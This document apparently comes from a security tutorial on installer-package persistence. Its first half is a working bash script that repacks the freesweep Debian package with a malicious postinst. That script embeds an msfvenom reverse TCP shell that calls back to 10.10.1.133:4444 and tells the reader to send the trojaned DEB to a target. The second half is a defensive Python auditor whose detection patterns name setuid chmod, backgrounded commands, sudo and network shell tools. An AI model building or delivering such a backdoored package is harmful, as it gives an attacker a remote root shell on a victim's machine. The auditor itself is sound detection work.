Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system.
Depending on the distribution, Linux versions of package installer scripts are sometimes called maintainer scripts or post-installation scripts.
First we need to locate a DEB package that we are going to infect with our payload. We will set everything up in our temp folder. I've automated the process and built a small bash script to create the DEB file; we send it to the user, and when the user installs
Build backdoor DEB:

```bash
sudo apt-get --download-only install freesweep
mkdir /tmp/evil
sudo mv /var/cache/apt/archives/freesweep_1.0.2-1_amd64.deb /tmp/evil
cd /tmp/evil
dpkg -x freesweep_1.0.2-1_amd64.deb work
mkdir work/DEBIAN
cd work/DEBIAN
# Define the content of the control file and create the file
cat <<EOL > control
Package: freesweep
Version: 0.90-1
Section: Games and Amusement
Priority: optional
Architecture: i386
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
Description: a text-based minesweeper
 Freesweep is an implementation of the popular minesweeper game, where
 one tries to find all the mines without igniting any, based on hints given
 by the computer. Unlike most implementations of this game, Freesweep
 works in any visual text display - in Linux console, in an xterm, and in
 most text-based terminals currently in use.
EOL
# Notify the user that the file has been created
echo "The control file has been created and populated."
# Now build a postinst file
cat <<EOL > postinst
#!/bin/sh
sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &
EOL
# Tell user files are built
echo "Files built successfully"
# Build the payload
msfvenom --platform linux -a x64 --payload linux/x64/shell_reverse_tcp LHOST=10.10.1.133 LPORT=4444 -b "\x00" -f elf -o /tmp/evil/work/usr/games/freesweep_scores
echo "Payload has been built"
# Make the postinst script executable
chmod 755 postinst
# Build the package
dpkg-deb --build /tmp/evil/work
# Move back 2 directories
cd ../..
# Rename file to whatever "freesweep" here
mv work.deb freesweep.deb
echo "All files created send target file FREESWEEP.DEB"
```
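The defensive counterpart to the walkthrough above is to inspect a .deb before it ever reaches dpkg: maintainer scripts in the control archive run as root at install time, so a package from outside the distribution's signed repositories deserves a look at exactly those files. The following is an added example, not part of the original page or of any dpkg tooling. It reads the ar(1) container a .deb is wrapped in, pulls the maintainer scripts and control file out of control.tar.*, and flags the idioms seen in the trojaned postinst above (a chmod that grants setuid/setgid, commands left running in the background, sudo inside a script that is already root) plus an Architecture field that disagrees with the host. The indicator list and both sample packages are constructed for this example; the control archive is assumed to be gzip- or xz-compressed (Python's tarfile does not read zstd before 3.14).

```python
import io
import re
import tarfile

# Maintainer scripts dpkg runs as root during install/remove.
MAINTAINER_SCRIPTS = {"preinst", "postinst", "prerm", "postrm"}

# Constructed indicator list for this example: idioms that warrant a closer read.
SUSPICIOUS = [
    (re.compile(r"\bchmod\s+[0-9]*[2467][0-9]{3}\b"), "setuid/setgid bit granted via chmod"),
    (re.compile(r"&\s*$", re.M), "command left running in the background"),
    (re.compile(r"\b(nc|ncat|socat|curl|wget)\b|/dev/tcp/"), "network client or reverse-shell idiom"),
    (re.compile(r"\bsudo\b"), "sudo inside a maintainer script (dpkg already runs it as root)"),
]


def parse_ar(blob):
    """Minimal reader for the ar(1) container a .deb is wrapped in: {member name: bytes}."""
    if not blob.startswith(b"!<arch>\n"):
        raise ValueError("not an ar archive")
    pos, members = 8, {}
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]
        if hdr[58:60] != b"`\n":
            raise ValueError("corrupt ar member header")
        name = hdr[0:16].decode("ascii").rstrip().rstrip("/")  # GNU ar may append '/'
        size = int(hdr[48:58])
        members[name] = blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size & 1)  # members are 2-byte aligned
    return members


def extract_control(deb):
    """Return (control fields dict, {script name: text}) from the control.tar.* member."""
    members = parse_ar(deb)
    ctl_name = next(n for n in members if n.startswith("control.tar"))
    fields, scripts = {}, {}
    with tarfile.open(fileobj=io.BytesIO(members[ctl_name]), mode="r:*") as tar:
        for m in tar.getmembers():
            if not m.isfile():
                continue
            base = m.name.split("/")[-1]  # entries are stored as ./postinst etc.
            text = tar.extractfile(m).read().decode("utf-8", errors="replace")
            if base == "control":
                for line in text.splitlines():
                    if line and not line[0].isspace() and ":" in line:  # skip folded lines
                        key, value = line.split(":", 1)
                        fields[key.strip()] = value.strip()
            elif base in MAINTAINER_SCRIPTS:
                scripts[base] = text
    return fields, scripts


def audit_deb(deb, expected_arch=None):
    """Flag maintainer-script idioms and a control/host architecture mismatch: [(where, why), ...]."""
    fields, scripts = extract_control(deb)
    findings = []
    arch = fields.get("Architecture")
    if expected_arch and arch not in (expected_arch, "all"):
        findings.append(("control", f"Architecture {arch!r} does not match host {expected_arch!r}"))
    for name, text in scripts.items():
        for pattern, why in SUSPICIOUS:
            if pattern.search(text):
                findings.append((name, why))
    return findings


def build_deb(control_text, scripts):
    """Constructed helper: assemble a minimal .deb in memory so the audit can run offline."""
    def tar_gz(files):
        buf = io.BytesIO()
        with tarfile.open(fileobj=buf, mode="w:gz") as tar:
            for name, content in files.items():
                data = content.encode()
                info = tarfile.TarInfo("./" + name)
                info.size, info.mode = len(data), 0o755
                tar.addfile(info, io.BytesIO(data))
        return buf.getvalue()

    def ar_member(name, data):
        hdr = f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(data):<10}`\n".encode("ascii")
        return hdr + data + (b"\n" if len(data) % 2 else b"")

    return (b"!<arch>\n"
            + ar_member("debian-binary", b"2.0\n")
            + ar_member("control.tar.gz", tar_gz({"control": control_text, **scripts}))
            + ar_member("data.tar.gz", tar_gz({})))


# Constructed sample: control claims i386 and the postinst mirrors the one in the walkthrough above.
TROJANED = build_deb(
    "Package: freesweep\nVersion: 0.90-1\nArchitecture: i386\nDescription: a text-based minesweeper\n"
    " folded description line\n",
    {"postinst": "#!/bin/sh\nsudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & "
                 "/usr/games/freesweep &\n"},
)
# Constructed sample: a benign package whose postinst only refreshes a cache.
BENIGN = build_deb(
    "Package: example\nVersion: 1.0-1\nArchitecture: amd64\n",
    {"postinst": "#!/bin/sh\nset -e\nupdate-desktop-database -q || true\n"},
)

if __name__ == "__main__":
    for label, pkg in (("trojaned", TROJANED), ("benign", BENIGN)):
        print(label, audit_deb(pkg, expected_arch="amd64"))
```

On a real file, `audit_deb(open("freesweep.deb", "rb").read(), expected_arch="amd64")` gives the same list; an empty result is not a clean bill of health, only the absence of these particular idioms, so pair it with verifying that the package hash matches the one your apt repository serves.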